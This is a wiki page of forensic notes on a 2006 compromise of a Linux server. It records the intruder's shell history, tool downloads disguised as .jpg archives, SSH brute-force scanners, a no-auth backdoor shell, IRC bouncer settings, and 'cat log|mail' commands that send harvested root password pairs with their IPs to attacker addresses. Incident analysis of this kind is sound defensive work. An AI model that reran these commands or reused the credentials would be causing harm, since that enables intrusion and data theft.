Forensics on Incident 1
Revision as of 22:36, 24 November 2010 by <bdi>PhilippeTeuwen</bdi> (talk | contribs) (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 +-20:20
========
test 30731 0.0 0.0 676 284 ? S 00:21 0:00 ./ntpd
test 31116 0.0 0.2 2944 1360 ? Ss 00:28 0:00 SCREEN
test 31117 0.0 0.2 3000 1228 pts/5 Ss 00:28 0:00 /bin/bash
test 31134 0.0 0.2 3164 1368 pts/5 S+ 00:29 0:00 /bin/bash
test 32352 0.0 0.0 1444 280 ? Ss 00:43 0:00 ./go
test 25680 0.0 0.2 2944 1412 ? Ss 09:03 0:00 SCREEN
test 25681 0.0 0.3 3000 1656 pts/6 Ss 09:03 0:00 /bin/bash
test 25717 0.0 0.3 3160 1748 pts/6 S+ 09:03 0:00 /bin/bash
test 4132 0.0 0.0 1344 204 pts/5 T+ 10:40 0:00 ./go
test 4135 0.0 0.0 0 0 pts/5 Z+ 10:40 0:00 [go] <defunct>
test 3211 0.0 0.0 1344 240 pts/5 T+ 20:05 0:00 ./go
test 3224 0.0 0.0 0 0 pts/5 Z+ 20:05 0:00 [go] <defunct>
test 4088 0.0 0.2 2704 1260 pts/6 S+ 20:35 0:00 /bin/bash ./assh 24.35
test 4089 49.4 0.0 1492 456 pts/6 R+ 20:35 4:43 ./pscan2 24.35 22
test 4090 0.0 0.0 0 0 pts/6 Z+ 20:35 0:00 [pscan2] <defunct>
test 4097 0.0 0.2 2704 1260 pts/5 S+ 20:35 0:00 /bin/bash ./assh 200.56
test 4098 49.4 0.0 1492 456 pts/5 R+ 20:35 4:43 ./pscan2 200.56 22
test 4099 0.0 0.0 0 0 pts/5 Z+ 20:35 0:00 [pscan2] <defunct>
Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
31116.pts-4.ns0 (Detached)
25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.
test@ns0:/root$ screen -r 31116
First screen:
=============
Copy of the current page:
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)
Second screen:
==============
Copy of the full screen buffer:
test@ns0:/var/tmp/.. /dan$
test@ns0:/var/tmp/.. /dan$ ls
200 assh gen-pass.sh pass_file sshf
200.221.pscan.22 auto go pscan2 ssh-scan
200.59.pscan.22 common go.sh ss vuln.txt
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)
test@ns0:/var/tmp/.. /2$ ./auto
Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/.. /2$ chmod +x 24
test@ns0:/var/tmp/.. /2$ ./24
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
...
Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/.. /2$ history
48 first line identical to .bash_history then
49 ./auto
50 chmod +x 24
51 ./24
Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .." "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .." "
cd .." "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .." "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e
Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)
Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
Netstat Abstract: (within the 800 simultaneous scans)
tcp 0 1 213.186.53.59:59930 24.35.236.71:22 SYN_SENT 4089/pscan2
tcp 0 1 213.186.53.59:60352 200.56.236.93:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60288 200.56.236.29:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60424 200.56.236.165:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60233 200.56.235.229:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60169 200.56.235.165:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60095 200.56.235.91:22 SYN_SENT 4098/pscan2
IRC:
====
* Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130
** = oslo1.no.eu.undernet.org
Netstat:
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 30731/ntpd
tcp 0 0 213.186.53.59:34227 195.204.1.130:6667 ESTABLISHED30731/ntpd
Diffs between the downloaded tool and the hacker's version:
--- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100
+++ log/psybnc.log 2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,15 @@
+Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667
+Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731)
+Fri Mar 17 00:21:14 :Loading all Users..
+Fri Mar 17 00:21:14 :No Users found.
+Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan)
+Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan
+Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat
+Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 ().
+Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 ()
+Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined)
+Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 ().
+Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 ()
+Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net)
--- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100
+++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,71 @@
+:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL
+:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07
+:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST
+:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov
+:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server
+:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server
+:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers
+:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online
+:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s)
+:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed
+:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers
+:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day -
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :)
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. Go to http://cservice.undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s)
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason.
+:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command.
--- psybnc.conf 2003-04-07 14:47:00.000000000 +0200
+++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100
@@ -1,3 +1,25 @@
PSYBNC.SYSTEM.PORT1=6667
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
+USER1.USER.LOGIN=dan
+USER1.USER.USER=x
+USER1.USER.PASS==0x'q'0'W`2'S0I'F`x
+USER1.USER.RIGHTS=1
+USER1.USER.VLINK=0
+USER1.USER.PPORT=0
+USER1.USER.PARENT=0
+USER1.USER.QUITTED=0
+USER1.USER.DCCENABLED=1
+USER1.USER.AUTOGETDCC=0
+USER1.USER.AIDLE=0
+USER1.USER.LEAVEQUIT=0
+USER1.USER.AUTOREJOIN=1
+USER1.USER.SYSMSG=1
+USER1.USER.LASTLOG=0
+USER1.USER.NICK=D-a-N
+USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
+USER1.SERVERS.PORT2=6667
+USER1.SERVERS.SERVER2=195.204.1.130
+USER1.SERVERS.PORT1=6667
+USER1.CHANNELS.ENTRY1=#porumbei
+USER1.CHANNELS.ENTRY0=#xibit
Backdoor:
=========
* ./go opens port 19876 with a shell without auth
cf http://www.2701.org/archive/200311240000.html
Netstat:
tcp 0 0 0.0.0.0:19876 0.0.0.0:* LISTEN 32352/go
* ./ss
cf http://www.securiteam.com/tools/5EP0B0ADFO.html
Fast SYN Scanner (libnet, libpcap) 11 Jul. 2004
Credit:
The information has been provided by Doctor BIOS.
The following tool is a fast SYN scanner written in C.
vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt
ssh brute-force:
================
ssh-scan and sshf
./sshf <procese adika cate de alea deodata incerc>
~= how many processes to run together
/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false
mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go
139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023 Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038 Date: Fri, 17 Mar 2006 17:35:14 +0100
To-be-Mailed data:
administrator:administrator:24.16.169.218
guest:guest:24.16.169.218
test:test:24.3.178.253
mysql:mysql:200.27.145.74
root:admin1:200.31.199.77
root:password:24.8.131.152
root:secure:24.11.225.20
root:123456:200.32.86.228
root:1234567890:200.32.86.228
root:admin1:200.32.86.228
root:admin:200.32.86.228
root:administrator1:200.32.86.228
root:backup:200.32.86.228
root:passwd:200.32.86.228
root:password123:200.32.86.228
root:password:200.32.86.228
root:qwerty:200.32.86.228
root:root1:200.32.86.228
root:root:200.32.86.228
root:rootroot:200.32.86.228
root:secret:200.32.86.228
root:secure:200.32.86.228
root:administrator:200.32.86.228
(honeypot probably)
RST virus:
==========
Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go Infection: Unix/RST.B
/tmp/scaner/pscan2 Infection: Unix/RST.B
/tmp/scaner/ss Infection: Unix/RST.B
/tmp/scaner/ssh-scan Infection: Unix/RST.B
/tmp/scaner/sshf Infection: Unix/RST.B
Results of virus scanning:
Infected: 5
Seems that infected files are updating them at each run and modify the timestamp
/home/test/scaner:
23714 2006-03-06 23:23 go
25503 2005-05-06 19:00 pscan2
458068 2006-03-07 00:03 ss
846520 2006-03-07 00:03 sshf
846832 2006-03-06 23:12 ssh-scan
/var/tmp/.. /2:
23714 2006-03-17 21:17 go
25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
/var/tmp/.. /dan:
23714 2006-03-17 10:35 go
25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
21:17 corresponds to the crash of the server so probably infected executables are left open even after being killed
Note: same virus present also in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND
TIMELINE:
=========
2006/02/16 08:58:08 82.79.137.30 vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30"
Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 06 06 12:30:50 4096 m.c drwxr-xr-x root root /etc/webmin
639 m.c -rw------- root root /etc/webmin/miniserv.conf
Mar 6 12:31:05 localhost webmin[31297]: Webmin starting
Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47 82.79.137.24 * vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24"
Mar 03 06 15:53:30 21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users
Mar 03 06 16:11:31 4096 m.c drwxr-xr-x root root /etc/exim4
7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf
Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01)
Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16 82.79.137.27 Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18 82.79.137.27 vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/06 22:28:18 82.79.137.18 Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20 82.79.137.18 vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18"
2006/03/06 22:28:29 82.79.137.25 * vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25"
2006/03/06 22:28:30 82.79.137.14 * vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14"
2006/03/06 22:28:39 82.79.137.22 Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test
2006/03/06 22:28:41 82.79.137.22 Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28 82.79.137.22 * test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52)
2006/03/06 22:31:06 82.79.137.18 Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14 82.79.137.7 * vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/06 22:40:54 82.79.137.22 *! Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35 82.79.137.22 *! Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan
2006/03/06 23:23:56 82.79.137.22 *! Mar 06 06 23:23:56 23714 m.. -rwxr-xr-x test test /home/test/scaner/go
2006/03/06 00:03:34 82.79.137.22 *! Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf
2006/03/06 00:03:34 82.79.137.22 *! 4096 m.. drwxr-xr-x test test /home/test/scaner
2006/03/06 00:03:34 82.79.137.22 *! 458068 m.. -rwxr-xr-x test test /home/test/scaner/ss
skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45)
2006/03/07 00:21:24 82.79.137.22 * Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01)
runlevel (to lvl 6) Tue Mar 7 00:59 - 00:59 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 00:59 - 01:02 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
skycode pts/0 Tue Mar 7 01:04 - 01:04 (00:00) 213.186.53.55
skycode pts/0 Tue Mar 7 08:28 - down (00:16) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 08:45 - 08:45 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 08:45 - 08:48 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
skycode pts/0 Tue Mar 7 08:56 - down (00:22) 213.186.53.55
skycode pts/1 Tue Mar 7 09:17 - down (00:01) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 09:18 - 09:18 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:18 - 09:22 (00:03) 2.4.27-2-386
reboot system boot Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:23 - down (00:01) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:25 - 09:25 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:25 - 09:28 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:34 - down (00:09) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:44 - 09:44 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:44 - 09:48 (00:04) 2.4.27-2-386
reboot system boot Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
2006/03/09 14:57:31 82.79.137.27 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27"
2006/03/09 14:57:31 82.79.137.26 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26"
2006/03/09 14:57:31 82.79.137.28 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:31 82.79.137.7 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/09 14:57:33 82.79.137.28 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:33 82.79.137.30 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30"
